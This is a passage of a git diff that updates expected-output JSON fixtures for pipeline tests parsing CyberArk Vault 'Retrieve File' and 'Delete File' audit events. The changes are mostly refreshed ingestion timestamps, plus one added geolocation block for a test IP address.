11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" @@ -110,7 +110,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-12-09T13:37:06.666790300Z", + "ingested": "2021-12-14T14:42:35.435741510Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AppProviderConf\",\"File\":\"Root\\\\main_appprovider.conf.Win64.11.04\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json index 7fc36b20c4b..6a20e77a944 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-52-delete-file.log-expected.json @@ -69,7 +69,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873530700Z", + "ingested": "2021-12-14T14:42:35.693137601Z", "original": "\u003c5\u003e1 2021-03-08T18:32:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:32:43\",\"IsoTimestamp\":\"2021-03-08T18:32:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" @@ -145,7 +145,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873540300Z", + "ingested": "2021-12-14T14:42:35.693140046Z", "original": "\u003c5\u003e1 2021-03-08T18:38:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:38:21\",\"IsoTimestamp\":\"2021-03-08T18:38:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"VaultInternal\",\"File\":\"Root\\\\Operating System-WinServerLocal-components-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinServerLocal\"},{\"Name\":\"UserName\",\"Value\":\"adriansr\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"LogonDomain\",\"Value\":\"COMPONENTS\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" @@ -203,7 +203,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873546400Z", + "ingested": "2021-12-14T14:42:35.693140504Z", "original": "\u003c5\u003e1 2021-03-08T19:20:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:04\",\"IsoTimestamp\":\"2021-03-08T19:20:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManager_workspace\",\"File\":\"Root\\\\Test_4\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" @@ -216,6 +216,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -262,7 +271,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873550500Z", + "ingested": "2021-12-14T14:42:35.693140936Z", "original": "\u003c5\u003e1 2021-03-11T18:59:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:59:57\",\"IsoTimestamp\":\"2021-03-11T18:59:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" @@ -330,7 +339,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873555300Z", + "ingested": "2021-12-14T14:42:35.693141327Z", "original": "\u003c5\u003e1 2021-03-11T19:32:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:32:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:32:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_1\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_2\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_3\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_4\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_5\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:32:12\",\"IsoTimestamp\":\"2021-03-11T19:32:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"_PSMLiveSessions_1\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_2\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_3\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_4\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_5\",\"Value\":\"\"}]}}}}", "code": "52", "kind": "event" @@ -406,7 +415,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873560700Z", + "ingested": "2021-12-14T14:42:35.693141735Z", "original": "\u003c5\u003e1 2021-03-11T21:06:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.14\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:40\",\"IsoTimestamp\":\"2021-03-11T21:06:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.14\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" @@ -480,7 +489,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873565700Z", + "ingested": "2021-12-14T14:42:35.693142145Z", "original": "\u003c5\u003e1 2021-03-11T21:06:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.65\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"ASR-CYBERARK-WI\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:50\",\"IsoTimestamp\":\"2021-03-11T21:06:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.65\"},{\"Name\":\"LogonDomain\",\"Value\":\"ASR-CYBERARK-WI\"}]}}}}", "code": "52", "kind": "event" @@ -554,7 +563,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873570100Z", + "ingested": "2021-12-14T14:42:35.693142531Z", "original": "\u003c5\u003e1 2021-03-14T12:10:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:10:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:10:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:10:17\",\"IsoTimestamp\":\"2021-03-14T12:10:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "52", "kind": "event" @@ -632,7 +641,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873574800Z", + "ingested": "2021-12-14T14:42:35.693142925Z", "original": "\u003c5\u003e1 2021-03-15T15:09:00Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:09:00\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:09:00Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-10.128.0.7-adrian\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.7\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"3306\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"test\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 08:09:00\",\"IsoTimestamp\":\"2021-03-15T15:09:00Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Database-Oracle-10.128.0.7-adrian\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.7\"},{\"Name\":\"Port\",\"Value\":\"3306\"},{\"Name\":\"Database\",\"Value\":\"test\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"}]}}}}", "code": "52", "kind": "event" @@ -710,7 +719,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-12-09T13:37:06.873578900Z", + "ingested": "2021-12-14T14:42:35.693143315Z", "original": "\u003c5\u003e1 2021-03-15T15:13:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:13:59\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:13:59Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n 